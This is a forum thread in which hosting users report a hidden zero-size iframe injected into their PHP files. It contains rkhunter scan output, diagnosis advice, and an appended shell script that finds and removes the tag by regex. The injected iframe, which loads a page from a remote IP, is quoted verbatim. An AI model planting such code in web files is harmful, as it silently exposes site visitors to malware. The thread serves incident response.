  1. #1

    iframe injection problem and rkhunter warnings

    I have a major problem with iframes being injected into every file (header.php, footer.php, index.php, login.php and vars.php) on all server accounts.

    Code:
    <iframe src='h t t p : / / 8 1 . 9 5 . 1 4 5 . 2 4 0 / g o . p h p ? s i d = 1' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>
    What is the reason, and how do I fix that?


    And my second problem is the rkhunter warnings; I am not sure if they are related to the first problem:
    rkhunter results:
    Code:
    Checking system commands...
    
      Performing 'strings' command checks
        Checking 'strings' command                               [ OK ]
    
      Performing 'shared libraries' checks
        Checking for preloading variables                        [ None found ]
        Checking for preload file                                [ Not found ]
        Checking LD_LIBRARY_PATH variable                        [ Not found ]
    
      Performing file properties checks
        Checking for prerequisites                               [ Warning ]
        /bin/awk                                                 [ OK ]
        /bin/basename                                            [ OK ]
        /bin/bash                                               [ OK ]
        /bin/cat                                                  [ OK ]
        /bin/chmod                                            [ OK ]
        /bin/chown                                               [ OK ]
        /bin/cp                                                  [ OK ]
        /bin/csh                                                 [ OK ]
        /bin/cut                                                 [ OK ]
        /bin/date                                                [ OK ]
        /bin/df                                                  [ OK ]
        /bin/dmesg                                               [ OK ]
        /bin/echo                                                [ OK ]
        /bin/ed                                                  [ OK ]
        /bin/egrep                                               [ OK ]
        /bin/env                                                 [ OK ]
        /bin/fgrep                                               [ OK ]
        /bin/grep                                                [ OK ]
        /bin/kill                                                [ OK ]
        /bin/login                                               [ OK ]
        /bin/ls                                                  [ OK ]
        /bin/mail                                                [ OK ]
        /bin/mktemp                                              [ OK ]
        /bin/more                                                [ OK ]
        /bin/mount                                               [ OK ]
        /bin/mv                                                  [ OK ]
        /bin/netstat                                             [ OK ]
        /bin/passwd                                              [ OK ]
        /bin/ps                                                  [ OK ]
        /bin/pwd                                                 [ OK ]
        /bin/rpm                                                 [ OK ]
        /bin/sed                                                 [ OK ]
        /bin/sh                                                  [ OK ]
        /bin/sort                                                [ OK ]
        /bin/su                                                  [ OK ]
        /bin/touch                                               [ OK ]
        /bin/uname                                               [ OK ]
        /bin/gawk                                                [ OK ]
        /bin/tcsh                                                [ OK ]
        /usr/bin/awk                                             [ OK ]
        /usr/bin/chattr                                          [ OK ]
        /usr/bin/curl                                            [ OK ]
        /usr/bin/cut                                             [ OK ]
        /usr/bin/diff                                            [ OK ]
        /usr/bin/dirname                                         [ OK ]
        /usr/bin/du                                              [ OK ]
        /usr/bin/env                                             [ OK ]
        /usr/bin/file                                            [ OK ]
        /usr/bin/find                                            [ OK ]
        /usr/bin/GET                                             [ Warning ]
        /usr/bin/groups                                          [ Warning ]
        /usr/bin/head                                            [ OK ]
        /usr/bin/id                                              [ OK ]
        /usr/bin/kill                                            [ OK ]
        /usr/bin/killall                                         [ OK ]
        /usr/bin/last                                            [ OK ]
        /usr/bin/lastlog                                         [ OK ]
        /usr/bin/ldd                                             [ Warning ]
        /usr/bin/less                                            [ OK ]
        /usr/bin/locate                                          [ OK ]
        /usr/bin/logger                                          [ OK ]
        /usr/bin/lsattr                                          [ OK ]
        /usr/bin/lynx                                            [ OK ]
        /usr/bin/md5sum                                          [ OK ]
        /usr/bin/newgrp                                          [ OK ]
        /usr/bin/passwd                                          [ OK ]
        /usr/bin/perl                                            [ OK ]
        /usr/bin/pstree                                          [ OK ]
        /usr/bin/readlink                                        [ OK ]
        /usr/bin/runcon                                          [ OK ]
        /usr/bin/sha1sum                                         [ OK ]
        /usr/bin/size                                            [ OK ]
        /usr/bin/slocate                                         [ OK ]
        /usr/bin/stat                                            [ OK ]
        /usr/bin/strace                                          [ OK ]
        /usr/bin/strings                                         [ OK ]
        /usr/bin/sudo                                            [ OK ]
        /usr/bin/tail                                            [ OK ]
        /usr/bin/test                                            [ OK ]
        /usr/bin/top                                             [ OK ]
        /usr/bin/tr                                              [ OK ]
        /usr/bin/uniq                                            [ OK ]
        /usr/bin/users                                           [ OK ]
        /usr/bin/vmstat                                          [ OK ]
        /usr/bin/w                                               [ OK ]
        /usr/bin/watch                                           [ OK ]
        /usr/bin/wc                                              [ OK ]
        /usr/bin/wget                                            [ OK ]
        /usr/bin/whatis                                          [ Warning ]
        /usr/bin/whereis                                         [ OK ]
        /usr/bin/which                                           [ OK ]
        /usr/bin/who                                             [ OK ]
        /usr/bin/whoami                                          [ OK ]
        /usr/bin/gawk                                            [ OK ]
        /sbin/chkconfig                                          [ OK ]
        /sbin/depmod                                             [ OK ]
        /sbin/ifconfig                                           [ OK ]
        /sbin/ifdown                                             [ Warning ]
        /sbin/ifup                                               [ Warning ]
        /sbin/init                                               [ OK ]
        /sbin/insmod                                             [ OK ]
        /sbin/ip                                                 [ OK ]
        /sbin/lsmod                                              [ OK ]
        /sbin/modinfo                                            [ OK ]
        /sbin/modprobe                                           [ OK ]
        /sbin/nologin                                            [ OK ]
        /sbin/rmmod                                              [ OK ]
        /sbin/runlevel                                           [ OK ]
        /sbin/sulogin                                            [ OK ]
        /sbin/sysctl                                             [ OK ]
        /sbin/syslogd                                            [ OK ]
        /usr/sbin/adduser                                        [ OK ]
        /usr/sbin/chroot                                         [ OK ]
        /usr/sbin/groupadd                                       [ OK ]
        /usr/sbin/groupdel                                       [ OK ]
        /usr/sbin/groupmod                                       [ OK ]
        /usr/sbin/grpck                                          [ OK ]
        /usr/sbin/kudzu                                          [ OK ]
        /usr/sbin/lsof                                           [ OK ]
        /usr/sbin/prelink                                        [ OK ]
        /usr/sbin/pwck                                           [ OK ]
        /usr/sbin/tcpd                                           [ OK ]
        /usr/sbin/useradd                                        [ OK ]
        /usr/sbin/userdel                                        [ OK ]
        /usr/sbin/usermod                                        [ OK ]
        /usr/sbin/vipw                                           [ OK ]
        /usr/sbin/xinetd                                         [ OK ]
        /usr/local/bin/perl                                      [ OK ]
        /usr/local/bin/rkhunter                                  [ OK ]
    
    
    Checking for rootkits...
    
      Performing check of known rootkit files and directories
        55808 Trojan - Variant A                                 [ Not found ]
        ADM Worm                                                 [ Not found ]
        AjaKit Rootkit                                           [ Not found ]
        aPa Kit                                                  [ Not found ]
        Apache Worm                                              [ Not found ]
        Ambient (ark) Rootkit                                    [ Not found ]
        Balaur Rootkit                                           [ Not found ]
        BeastKit Rootkit                                         [ Not found ]
        beX2 Rootkit                                             [ Not found ]
        BOBKit Rootkit                                           [ Not found ]
        CiNIK Worm (Slapper.B variant)                           [ Not found ]
        Danny-Boy's Abuse Kit                                    [ Not found ]
        Devil RootKit                                            [ Not found ]
        Dica-Kit Rootkit                                         [ Not found ]
        Dreams Rootkit                                           [ Not found ]
        Duarawkz Rootkit                                         [ Not found ]
        Enye LKM                                                 [ Not found ]
        Flea Linux Rootkit                                       [ Not found ]
        FreeBSD Rootkit                                          [ Not found ]
        ****`it Rootkit                                          [ Not found ]
        GasKit Rootkit                                           [ Not found ]
        Heroin LKM                                               [ Not found ]
        HjC Kit                                                  [ Not found ]
        ignoKit Rootkit                                          [ Not found ]
        ImperalsS-FBRK Rootkit                                   [ Not found ]
        Irix Rootkit                                             [ Not found ]
        Kitko Rootkit                                            [ Not found ]
        Knark Rootkit                                            [ Not found ]
        Li0n Worm                                                [ Not found ]
        Lockit / LJK2 Rootkit                                    [ Not found ]
        Mood-NT Rootkit                                          [ Not found ]
        MRK Rootkit                                              [ Not found ]
        Ni0 Rootkit                                              [ Not found ]
        Ohhara Rootkit                                           [ Not found ]
        Optic Kit (Tux) Worm                                     [ Not found ]
        Oz Rootkit                                               [ Not found ]
        Phalanx Rootkit                                          [ Not found ]
        Phalanx Rootkit (strings)                                [ Not found ]
        Portacelo Rootkit                                        [ Not found ]
        R3dstorm Toolkit                                         [ Not found ]
        RH-Sharpe's Rootkit                                      [ Not found ]
        RSHA's Rootkit                                           [ Not found ]
        Scalper Worm                                             [ Not found ]
        Sebek LKM                                                [ Not found ]
        Shutdown Rootkit                                         [ Not found ]
        SHV4 Rootkit                                             [ Not found ]
        SHV5 Rootkit                                             [ Not found ]
        Sin Rootkit                                              [ Not found ]
        Slapper Worm                                             [ Not found ]
        Sneakin Rootkit                                          [ Not found ]
        Suckit Rootkit                                           [ Not found ]
        SunOS Rootkit                                            [ Not found ]
        SunOS / NSDAP Rootkit                                    [ Not found ]
        Superkit Rootkit                                         [ Not found ]
        TBD (Telnet BackDoor)                                    [ Not found ]
        TeLeKiT Rootkit                                          [ Not found ]
        T0rn Rootkit                                             [ Not found ]
        Trojanit Kit                                             [ Not found ]
        Tuxtendo Rootkit                                         [ Not found ]
        URK Rootkit                                              [ Not found ]
        VcKit Rootkit                                            [ Not found ]
        Volc Rootkit                                             [ Not found ]
        X-Org SunOS Rootkit                                      [ Not found ]
        zaRwT.KiT Rootkit                                        [ Not found ]
    
      Performing additional rootkit checks
        Suckit Rookit additional checks                          [ OK ]
        Checking for possible rootkit files and directories      [ None found ]
        Checking for possible rootkit strings                    [ None found ]
    
      Performing malware checks
        Checking running processes for suspicious files          [ None found ]
        Checking for login backdoors                             [ None found ]
        Checking for suspicious directories                      [ None found ]
        Checking for sniffer log files                           [ None found ]
    
      Performing trojan specific checks
        Checking for enabled xinetd services                     [ None found ]
        Checking for Apache backdoor                             [ Not found ]
    
      Performing Linux specific checks
        Checking kernel module commands                          [ OK ]
        Checking kernel module names                             [ OK ]
    Checking the network...
    
      Performing check for backdoor ports
        Checking for UDP port 2001                               [ Not found ]
        Checking for TCP port 2006                               [ Not found ]
        Checking for TCP port 2128                               [ Not found ]
        Checking for TCP port 14856                              [ Not found ]
        Checking for TCP port 47107                              [ Not found ]
        Checking for TCP port 60922                              [ Not found ]
    
      Performing checks on the network interfaces
        Checking for promiscuous interfaces                      [ None found ]
    
    Checking the local host...
    
      Performing system boot checks
        Checking for local host name                             [ Found ]
        Checking for local startup files                         [ Found ]
        Checking local startup files for malware                 [ None found ]
        Checking system startup files for malware                [ None found ]
    
      Performing group and account checks
        Checking for passwd file                                 [ Found ]
        Checking for root equivalent (UID 0) accounts            [ None found ]
        Checking for passwordless accounts                       [ None found ]
        Checking for passwd file changes                         [ None found ]
        Checking for group file changes                          [ None found ]
        Checking root account shell history files                [ OK ]
    
      Performing system configuration file checks
        Checking for SSH configuration file                      [ Found ]
        Checking if SSH root access is allowed                   [ Warning ]
        Checking if SSH protocol v1 is allowed                   [ Warning ]
        Checking for running syslog daemon                       [ Found ]
        Checking for syslog configuration file                   [ Found ]
        Checking if syslog remote logging is allowed             [ Not allowed ]
    
      Performing filesystem checks
        Checking /dev for suspicious file types                  [ None found ]
        Checking for hidden files and directories                [ Warning ]
    Checking application versions...
    
        Checking version of Exim MTA                             [ OK ]
        Checking version of GnuPG                                [ Warning ]
        Checking version of Apache                               [ Skipped ]
        Checking version of Bind DNS                             [ OK ]
        Checking version of OpenSSL                              [ Warning ]
        Checking version of PHP                                  [ OK ]
        Checking version of Procmail MTA                         [ OK ]
        Checking version of OpenSSH                              [ OK ]
    
    
    System checks summary
    =====================
    
    File properties checks...
        Required commands check failed
        Files checked: 129
        Suspect files: 6
    
    Rootkit checks...
        Rootkits checked : 114
        Possible rootkits: 0
    
    Applications checks...
        Applications checked: 8
        Suspect applications: 2
    
    The system checks took: 3 minutes and 12 seconds
    
    All results have been written to the logfile (/var/log/rkhunter.log)
    
    One or more warnings have been found while checking the system.
    Please check the log file (/var/log/rkhunter.log)
    How can I fix all these problems, please?
    Last edited by xserverx; 08-25-2007 at 12:17 PM.

  2. #2
    Join Date: Mar 2003 | Location: Canada | Posts: 9,072
    In regards to the iframe problem, have you verified this by viewing the files on your server OR via your internet browser?
    RACK911 Labs | Penetration Testing | https://www.RACK911Labs.ca

    www.HostingSecList.com - Security Notices for the Hosting Community.

  3. #3
    Quote Originally Posted by Pat H View Post
    In regards to the iframe problem, have you verified this by viewing the files on your server OR via your internet browser?

    On most sites, when I browse them from IE, my antivirus signals the presence of a virus; in the page source I found iframe injections.

  4. #4
    Can someone help me?

  5. #5
    Join Date: Jun 2006 | Location: Israel | Posts: 38
    I'm having the same problem on my sites. At the page bottom (right after the PHP ends with ?>) I have the following code:
    Code:
    <iframe src='http://81.95.145.240/go.php?sid=1' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>
    It was in my gallery index (photopost), vbulletin login page and index, site index, and news page (cutenews).
    Anything I can do to see how I got it?

    My server is a CentOS 4.3, with Apache 1.337 and PHP 4.4.7.

    Thanks

  6. #6
    Join Date: Aug 2007 | Posts: 57
    You probably either have weak passwords on an FTP account, or (more likely) you're running a web script/software that has a known vulnerability.

    For all the scripts you have on the server, check to make sure there's no known security holes with the installed version, and sign up to receive e-mail updates should a security update be released.

    Check the file modification times. The script or software that was first defaced is most likely the entry point, but not necessarily; it could be that it offered entry, but was not itself vulnerable to defacement.

    Based on the characteristics, I'd suspect an automated worm that's finding a common vulnerability (well-known software on your server), and appending the iframe code to any files it can find.

    FYI, "injection" isn't really the right term here; the files were modified, hence this is defacement. Injection would suggest cross-site scripting attacks (which do not modify files on your server), or something like an SQL-based attack. Also, rkhunter is unlikely to find anything, as it's not checking for vulnerable versions of PHP scripts, etc.
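The triage post #6 describes (find every file carrying the hidden iframe, order them by modification time to spot the first one hit, then strip the tag) as a small shell script. This is an added example, not code from anyone in the thread; it assumes GNU coreutils `stat`/`sed` as found on a CentOS box, and the sample web root it builds is constructed here, with the iframe line copied from the posts above.

```shell
#!/bin/sh
# Added example: locate hidden-iframe defacement under a web root,
# list hits oldest-first by mtime, and strip the injected tag.

# Signature of the zero-size iframe quoted in the thread. Matching on
# WIDTH=0 / HEIGHT=0 rather than the IP catches the same trick with a
# different host.
IFRAME_RE="<iframe[^>]*WIDTH=0[^>]*HEIGHT=0[^>]*>[[:space:]]*</iframe>"

# Print "epoch<TAB>path" for each PHP/HTML file containing the iframe,
# sorted by mtime. The oldest hit is the best candidate for the entry
# point (post #6: first defaced file is most likely where they got in).
find_injected() {
    root="$1"
    find "$root" -type f \( -name '*.php' -o -name '*.html' -o -name '*.htm' \) -print |
    while IFS= read -r f; do
        if grep -Eq "$IFRAME_RE" "$f"; then
            # stat -c %Y is GNU coreutils (assumption, see lead-in)
            printf '%s\t%s\n' "$(stat -c %Y "$f")" "$f"
        fi
    done | sort -n
}

# Number of defaced files under the root.
count_injected() {
    find_injected "$1" | wc -l | tr -d ' '
}

# Remove only the iframe tag from one file, keeping a .bak copy for
# forensics. The file's inode and permissions are preserved.
clean_file() {
    f="$1"
    cp -p "$f" "$f.bak"
    sed -E "s#$IFRAME_RE##g" "$f.bak" > "$f"
}

# Constructed sample web root: one clean file, two defaced ones with the
# tag appended after the closing ?> exactly as post #5 describes.
INJECTED="<iframe src='http://81.95.145.240/go.php?sid=1' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>"
make_sample_root() {
    d=$(mktemp -d)
    printf '<?php echo "clean"; ?>\n' > "$d/index.php"
    printf '<?php echo "login"; ?>\n%s\n' "$INJECTED" > "$d/login.php"
    printf '<?php echo "footer"; ?>\n%s\n' "$INJECTED" > "$d/footer.php"
    echo "$d"
}

# Stand-alone run: report hits, then clean them.
if [ "${1:-}" = "--demo" ]; then
    ROOT=$(make_sample_root)
    find_injected "$ROOT"
    find_injected "$ROOT" | cut -f2 | while IFS= read -r f; do clean_file "$f"; done
    echo "remaining: $(count_injected "$ROOT")"
fi
```

Run it as `sh scan.sh --demo` for the constructed sample, or call `find_injected /var/www` against a real document root and read the `.bak` copies before deleting anything.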
